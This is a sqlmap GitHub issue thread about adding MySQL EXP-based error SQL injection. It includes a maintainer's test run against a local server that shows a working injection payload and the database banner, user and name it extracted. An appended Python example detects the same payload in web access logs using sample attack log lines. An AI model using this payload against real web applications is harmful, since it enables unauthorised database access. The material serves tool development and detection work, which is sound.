
add EXP support in error based #1363

Closed
shadowzoom opened this issue Aug 27, 2015 · 4 comments

Comments

@shadowzoom

Can we get support for EXP queries in error-based? :)

https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/
https://www.exploit-db.com/docs/37953.pdf

@stamparm
Member

No problem, but there are already lots of other error payloads. This one will/would go under a way higher --level (e.g. --level=3)

@stamparm stamparm self-assigned this Aug 27, 2015
@stamparm stamparm added this to the 1.0 milestone Aug 27, 2015
stamparm added a commit that referenced this issue Aug 28, 2015
@stamparm
Member

$ python sqlmap.py -u "http://192.168.5.40/mysql_getint.php?id=1" -z "flu,bat,tec=E" --test-filter "exp" --banner --current-db --current-user
         _
 ___ ___| |_____ ___ ___  {1.0-dev-ee22c47}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:59:52

[10:59:52] [INFO] flushing session file
[10:59:52] [INFO] testing connection to the target URL
[10:59:52] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:59:52] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to XSS attacks
[10:59:52] [INFO] testing for SQL injection on GET parameter 'id'
[10:59:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:59:52] [INFO] GET parameter 'id' is 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' injectable 
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 3 HTTP(s) requests:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)
    Payload: id=1 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x716a706b71,(SELECT (ELT(7583=7583,1))),0x7176787071,0x78))x))
---
[10:59:52] [INFO] testing MySQL
[10:59:52] [INFO] confirming MySQL
[10:59:52] [INFO] the back-end DBMS is MySQL
[10:59:52] [INFO] fetching banner
[10:59:52] [INFO] retrieved: 5.6.26
web application technology: PHP 5.5.28, Apache
back-end DBMS: MySQL >= 5.0.0
banner:    '5.6.26'
[10:59:52] [INFO] fetching current user
[10:59:52] [INFO] retrieved: root@localhost
current user:    'root@localhost'
[10:59:52] [INFO] fetching current database
[10:59:52] [INFO] retrieved: testdb
current database:    'testdb'
[10:59:52] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/192.168.5.40'

[*] shutting down at 10:59:52

@stamparm
Member

p.s. it is being used when --level >= 4
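A defender-side check for the payload shape shown in the transcript above, added here as an example and not code from sqlmap or from the issue: it decodes query parameters out of constructed Apache-style access-log lines and flags requests carrying the EXP(~(SELECT ...)) pattern, noting whether the two long hex marker literals sqlmap wraps around the extracted value are present. The host name, log lines and function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Payload shape from the issue: EXP(~(SELECT ...)) makes MySQL raise a
# DOUBLE value out-of-range error whose message echoes the subquery result.
EXP_PATTERN = re.compile(r"\bEXP\s*\(\s*~\s*\(\s*SELECT\b", re.IGNORECASE)
# sqlmap brackets the extracted value with long hex-literal marker strings
HEX_MARKER = re.compile(r"0x[0-9a-fA-F]{6,}")
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def decode_params(url):
    """Parameter values from a URL; parse_qsl decodes once, unquote_plus
    strips one extra layer in case the payload was double-encoded."""
    return [unquote_plus(v) for _, v in parse_qsl(urlsplit(url).query, keep_blank_values=True)]


def classify_request(url):
    """Flag a request whose parameters carry an EXP error-based payload."""
    for value in decode_params(url):
        if EXP_PATTERN.search(value):
            return {
                "suspicious": True,
                "technique": "mysql-exp-error-based",
                # two or more long hex literals is the sqlmap marker pattern
                "sqlmap_markers": len(HEX_MARKER.findall(value)) >= 2,
            }
    return {"suspicious": False, "technique": None, "sqlmap_markers": False}


def scan_log(lines):
    """Return (path, verdict) for every suspicious request in access-log lines."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if m and (verdict := classify_request("http://host" + m.group(1)))["suspicious"]:
            hits.append((m.group(1), verdict))
    return hits


# Constructed sample log lines (Apache combined format), not from the issue.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Aug/2015:10:59:52 +0200] "GET /mysql_getint.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [28/Aug/2015:10:59:52 +0200] "GET /mysql_getint.php?id=1%20AND%20EXP(~(SELECT%20*%20FROM%20(SELECT%20CONCAT(0x716a706b71,(SELECT%20(ELT(7583=7583,1))),0x7176787071,0x78))x)) HTTP/1.1" 500 241',
    '198.51.100.7 - - [28/Aug/2015:11:02:10 +0200] "GET /search.php?q=exponential+growth HTTP/1.1" 200 3021',
    '198.51.100.7 - - [28/Aug/2015:11:02:11 +0200] "GET /mysql_getint.php?id=1%2520AND%2520EXP(~(SELECT%25201)) HTTP/1.1" 500 239',
]

if __name__ == "__main__":
    for path, verdict in scan_log(SAMPLE_LOG):
        print(verdict["technique"], "sqlmap markers" if verdict["sqlmap_markers"] else "", path)
```

The double-encoded fourth line is caught as the same technique but without the sqlmap marker literals, so the check separates tool-generated probes from hand-crafted ones.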

stamparm added a commit that referenced this issue Aug 28, 2015
@OsandaMalith

nice ;)


3 participants